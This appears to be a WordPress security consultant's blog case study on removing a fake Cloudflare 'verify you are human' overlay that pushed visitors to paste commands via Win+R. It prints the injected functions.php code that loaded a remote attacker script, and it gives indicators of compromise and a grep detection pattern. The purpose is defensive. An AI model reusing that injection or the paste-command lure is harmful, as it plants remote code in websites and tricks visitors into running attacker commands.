WordPress Hacked: Fake Cloudflare “Verify You Are Human” — A WordPress Malware Removal Case Study

Published on 9/6/2025
MD Pabel
Read with ChatGPT

Summary: A client’s website was hacked. A fake Cloudflare “Verify you are human” page showed on their domain. I traced it to a malicious script https://digitalsheat[.]com/loader.js (also seen as digitalsheet[.]com/loader.js) loaded from the custom theme’s functions.php. The script added a full-screen iframe, asked users to press Win+R and Ctrl+V, and used a MutationObserver to persist. I removed the injection, cleaned the malware, checked the server, hardened security, and brought the site back the same day.

Fake Cloudflare page
Fake Cloudflare page showing on the site’s domain.

What users saw

Visitors hit a full-page “Verify you are human” screen that blocked the real site.

Step 1 — Check the DOM (prove it is fake)

I opened DevTools → Elements. I saw the overlay HTML inside the page DOM (elements like checkbox-verify). Real Cloudflare checks do not ship as theme or plugin HTML.

DOM elements
Overlay elements present in the site’s DOM.

Step 2 — Watch the Network (no real verification)

I clicked the checkbox and watched DevTools → Network. The page sent no API/XHR calls to Cloudflare or the app. It only loaded static files. This is social engineering, not security.

Win+R Ctrl+V prompt
The prompt tells users to press Win+R / Ctrl+V. A browser check never needs OS commands.

Step 3 — Review the admin (backdoor / fake plugins)

In wp-admin I spotted fake/backdoor plugins that looked like normal tools. Attackers often use these for persistence.

Fake plugins
Suspicious fake plugins used as backdoors.

Step 4 — Hunt the payload (DevTools → Sources)

In Sources, I found an unknown loader.js. When I paused on exceptions, I saw obfuscated code with a MutationObserver. That is a strong persistence sign.

Obfuscated loader.js
Obfuscated loader.js manipulating the page.

Step 5 — Confirm the external source (and the request)

Sources showed: digitalsheat[.]com/loader.js (also digitalsheet[.]com/loader.js).

External source confirmation

Network confirmed the browser fetched the same script.

Network request confirmation

The script loads from an attacker domain. They can change it any time.

Step 6 — Find the persistence in the custom theme

I searched the code for loader.js and wp_enqueue_script. I found this in the custom theme functions.php:


function enqueue_custom_script() {
  wp_enqueue_script(
    'custom-error-script',
    'https://digitalsheat.com/loader.js',
    array(),
    null,
    true
  );
}
add_action('wp_enqueue_scripts', 'enqueue_custom_script');

I removed this code. The fake page disappeared.

Malicious enqueue code
Malicious enqueue inside the custom theme.

What the malware does (plain language)

Overlay and throttle

  • On DOMContentLoaded, it creates a full-screen iframe (position: fixed; inset: 0; z-index: 2147483647).
  • It disables scroll (body.style.overflow=’hidden’).
  • It injects a base64 HTML template that looks like Cloudflare.
  • It stores a time stamp in localStorage so the overlay returns less often (about 24 hours). This hides patterns.

Push the user to run commands

  • It tells users to press Win+R and Ctrl+V.
  • This is MITRE ATT&CK T1204: User Execution. It tries to make the user run attacker commands.

Look legit and avoid noise

  • It skips some user agents (often mobile).
  • It uses the site’s domain/title and an icon to appear “native.”

Stay persistent

  • It uses wp_enqueue_scripts so it runs on every page load.
  • Because it loads from a remote domain, the attacker can swap payloads without touching your server again.

Indicators of Compromise (search these)

Domains / URLs

  • https://digitalsheat[.]com/loader.js
  • https://digitalsheet[.]com/loader.js (common variant)

WordPress hooks / function names

  • add_action(‘wp_enqueue_scripts’,’enqueue_custom_script’);
  • wp_enqueue_script(‘custom-error-script’,’https://…/loader.js’,…);

Obfuscated JavaScript signs

  • _0x-style names, array-rotation loops, atob(…) + TextDecoder, MutationObserver, full-screen iframe with very high z-index.

Quick scans

# Code
grep -RniE "digitals?heat\.com|loader\.js|enqueue_custom_script|custom-error-script|_0x[0-9a-f]{3,}" wp-content

Likely root cause

We did not see the first entry point in the evidence. The common causes are outdated or vulnerable plugins/themes, weak or reused passwords, exposed admin panels, or nulled components. The changed functions.php shows someone edited code after deployment.

Remediation I performed (short)

  1. Containment — I removed the malicious enqueue and all calls to digitalsheat[.]com/loader.js. I put the site in a brief maintenance window and disabled file editing in the dashboard.
  2. Clean & verify — I cleaned the infected files (functions.php, injected JS), removed fake/backdoor plugins, searched code and database for IoCs, updated WordPress core, plugins, and the custom theme, and checked that no executable files sit in writable folders (like uploads/).
  3. Server checks — I reviewed system and user crontabs and WP-Cron, audited processes and startup services, and checked .htaccess, .user.ini, and php.ini for auto_prepend_file / auto_append_file. I also verified SSH keys, users, file owners, and recent changes.
  4. Hardening — I enabled DISALLOW_FILE_EDIT, applied least-privilege permissions, rotated all passwords and AUTH_KEY/SALTS, turned on 2FA for admins, upgraded PHP to a supported version, added security headers, and enabled a trusted WAF with rate limits.
  5. Monitoring — I set up file-integrity monitoring and daily offsite backups. I added alerts for theme/plugin changes, new outbound JS domains, unusual logins, and error spikes.

Result: The fake page vanished at once. The site made no further requests to the attacker domain. The site remains stable under monitoring.

Post-cleanup checks (quick list)

  • Network: no calls to digitalsheat[.]com/loader.js or digitalsheet[.]com/loader.js.
  • Elements / Sources: no overlay or injector code.
  • localStorage: no overlay keys.

Fresh devices/sessions: real site loads every time.

How to remove malware from a WordPress site (action guide)

  1. Do not follow any Win+R / Ctrl+V prompts.
  2. Open DevTools → Network, reload, and look for unknown external JavaScript.
  3. Check the theme functions.php and mu-plugins for strange wp_enqueue_script calls.
  4. Remove the malware, update WordPress core, plugins, and the theme, and delete what you don’t use.
  5. Rotate all passwords and refresh salts; enable MFA.
  6. Add a WordPress firewall and security tool; enable file-integrity monitoring and tested backups.

Results (business value)

  • Fast recovery — I restored the site the same day.
  • Threat removed — No more calls to attacker domains.
  • Stronger security — Updates, MFA, least privilege, and monitoring are now in place.

Professional WordPress Malware Removal Service

If your WordPress site has been compromised or you suspect malware infection, don’t risk your business reputation and data. I provide comprehensive WordPress malware removal services that include:

  • Complete malware detection and removal
  • Security vulnerability assessment
  • Website hardening and protection
  • Backup and recovery solutions
  • Ongoing monitoring and maintenance

Get your website cleaned and secured by a professional. Learn more about my WordPress Malware Removal service and protect your online presence today.

Explore Our Security Services

WordPress Malware Removal

Professional WordPress malware removal to clean, secure & restore your hacked site fast — trusted by 2300+ clients.

Custom Website Development

Build a custom, responsive & SEO-optimized website or web app with modern tech — tailored to your business goals.

Fix WordPress Errors

Diagnose and fix WordPress site issues — fatal errors, performance problems, broken layouts, plugin conflicts and more.

About the Author

MD Pabel

MD Pabel

MD Pabel is the Founder and CEO of 3Zero Digital, a leading agency specializing in custom web development, WordPress security, and malware removal. With over 7+ Years years of experience, he has completed more than3200+ projects, served over 2300+ clients, and resolved4500+ cases of malware and hacked websites.

3Zero DigitalLinkedInGitHubLeetCodeHackerRankMediumDev.toX (Twitter)